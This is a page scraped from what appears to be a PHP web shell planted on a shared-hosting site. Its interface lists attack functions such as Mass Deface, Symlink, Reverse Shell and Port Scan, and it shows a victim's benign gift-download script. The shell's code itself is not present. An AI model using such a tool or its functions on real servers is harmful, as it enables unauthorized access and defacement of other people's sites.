Tul xxx Tul
User / IP
:
216.73.216.146
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
emprendo.com.co
/
public_html
/
ecomercial
/
Viewing: gift-media.php
<?php require_once __DIR__ . '/app/gift_helpers.php'; $token = trim((string) ($_GET['token'] ?? '')); try { $pdo = db(true); $gift = gift_by_token($pdo, $token); } catch (Throwable $exception) { http_response_code(500); exit('No se pudo validar el regalo.'); } if (!$gift) { http_response_code(404); exit('Regalo no disponible.'); } $fileUrl = trim((string) $gift['gift_file_url']); if (preg_match('#^https?://#', $fileUrl)) { redirect($fileUrl); } $path = gift_file_path($gift); if (!$path) { http_response_code(404); exit('Archivo no encontrado.'); } $mime = $gift['gift_mime_type'] ?: (function_exists('mime_content_type') ? (mime_content_type($path) ?: 'application/octet-stream') : 'application/octet-stream'); while (ob_get_level()) { ob_end_clean(); } header('Content-Type: ' . $mime); header('Content-Length: ' . filesize($path)); header('Content-Disposition: inline; filename="' . str_replace('"', '', basename($gift['gift_original_name'])) . '"'); header('Cache-Control: private, no-store'); header('X-Content-Type-Options: nosniff'); readfile($path); exit;
Coded With 💗 by
0x6ick